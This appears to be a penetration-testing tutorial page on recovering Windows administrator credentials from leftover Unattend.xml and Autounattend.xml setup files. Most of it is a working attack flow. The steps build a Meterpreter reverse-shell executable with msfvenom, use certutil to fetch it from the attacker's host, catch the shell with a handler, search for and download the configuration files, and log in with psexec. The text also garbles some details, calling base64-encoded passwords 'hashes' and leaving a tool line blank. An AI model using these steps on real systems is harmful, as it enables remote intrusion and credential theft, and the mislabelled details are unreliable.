πSearching For Passwords In Windows Configuration Files
Windows Configuration Files
Windows can automate a variety of repetitive tasks, such as the mass rollout or installation of Windows on many systems.
This is typically done through the use of the Unattended Windows Setup utility, which is used to automate the mass installation/deployment of Windows on systems.
This tool utilizes configuration files that contain specific configurations and user account credentials, specifically the Administrator accountβs password.
If the Unattended Windows Setup configuration files are left on the target system after installation, they can reveal user account credentials that can be used by attackers to authenticate with Windows target legitimately.
Unattended Windows Setup
The Unattended Windows Setup utility will typically utilize one of the following configuration files that contain user account and system configuration information:
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Autounattend.xml
As a security precaution, the passwords stored in the Unattended Windows Setup configuration file may be encoded in base64.
Attack Flow for Installing Meterpreter Shell and Extracting Password Hashes
Overview
In this attack scenario, we aim to gain control over a Windows target server by installing a Meterpreter shell and then extracting password hashes from the Autounattend.xml or Unattend.xml files. These files often contain sensitive information, including password hashes, which can be used for further exploitation.
Steps in the Attack Flow
1. Create a Meterpreter Payload
Objective: Generate a malicious executable that will create a Meterpreter session on the Windows target server.
Command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_local_ip> LPORT=<your_local_port> -f exe -o meterpreter_shell.exeExplanation: This command creates an
exefile namedmeterpreter_shell.exethat, when executed on the target machine, will open a Meterpreter session back to your local machine.
2. Install the Meterpreter Payload on the Target Machine
Objective: Deliver and execute the
meterpreter_shell.exepayload on the Windows target server.Command:
certutil -urlcache -split -f http://<your_local_ip>/meterpreter_shell.exe C:\Users\Public\meterpreter_shell.exeExplanation: This command uses
certutilto download and save themeterpreter_shell.exepayload from your local machine to the target machine.Execute:
C:\Users\Public\meterpreter_shell.exeExplanation: Manually execute the downloaded payload to open a Meterpreter session.
Certutil is a versatile Windows command-line tool used for managing and configuring certificates and certification authorities (CAs). It provides advanced capabilities for dumping cached credentials, exporting and importing certificates, and configuring certificate trust stores, making it essential for both system administration and post-exploitation security assessments.
3. Set Up a Listener on Your Local Machine
Objective: Prepare your local machine to receive a connection from the Meterpreter payload.
Command:
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST <your_local_ip> set LPORT <your_local_port> exploitExplanation: This sets up a listener that waits for a connection from the Meterpreter shell.
4. Establish a Meterpreter Session
Objective: Gain control of the target system through the Meterpreter session.
Command:
Wait for the connection from the Meterpreter payload. Once the connection is established, you will have control over the target machine.
5. Locate Autounattend.xml or Unattend.xml Files
Autounattend.xml or Unattend.xml FilesObjective: Find the files that contain the password hashes.
Approach 1: Search Using Meterpreter
Command:
search -f autounattend.xml search -f unattend.xmlExplanation: Use the
searchcommand in Meterpreter to look forAutounattend.xmlorUnattend.xmlfiles on the target system.
Approach 2: Manual Navigation
Directories to Check:
C:\Windows\System32\SysprepC:\C:\ProgramData\Microsoft\Windows\
Explanation: Navigate to these directories to manually look for
Autounattend.xmlorUnattend.xmlfiles.
6. Download the Configuration Files
Objective: Transfer the
Autounattend.xmlorUnattend.xmlfiles to your local machine for analysis.Command:
download C:\Path\To\Autounattend.xml download C:\Path\To\Unattend.xmlExplanation: Use the
downloadcommand in Meterpreter to copy the files from the target machine to your local machine.
7. Extract and Use Password Hashes
Objective: Extract the password hashes from the downloaded files for further exploitation.
Tool:
Command:
python psexec.py <target_ip> -u <username> -p <password>Explanation: Use the
psexec.pyscript to log into the target system using the extracted credentials.
Hacker's Mantra:Very smart people are often tricked by hackers, by phishing. I donβt exclude myself from that. Itβs about being smarter than a hacker. Not about being smart. - Harper Reed
Last updated
Was this helpful?